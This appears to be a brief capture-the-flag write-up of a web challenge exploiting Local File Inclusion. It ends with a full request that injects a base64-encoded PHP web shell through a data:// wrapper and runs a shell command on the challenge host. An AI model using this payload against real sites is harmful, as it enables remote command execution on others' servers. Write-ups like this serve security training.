Tags: websec web200 web 

Rating: 0

# Flag Locker

The flag locker challenge was a fun Local File Inclusion

Looking at the URL I saw the page include : `locker=why` and `locker=privacy`

![Imgur](https://i.imgur.com/755yLSX.png)

We can easily get the flag with the `data://text/plain;base64`

Let's encode a basic php function :

![Imgur](https://i.imgur.com/YSBtqPB.png)

Now we can run `103.5.112.91:1234/?cmd=grep flag index.php&locker=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=`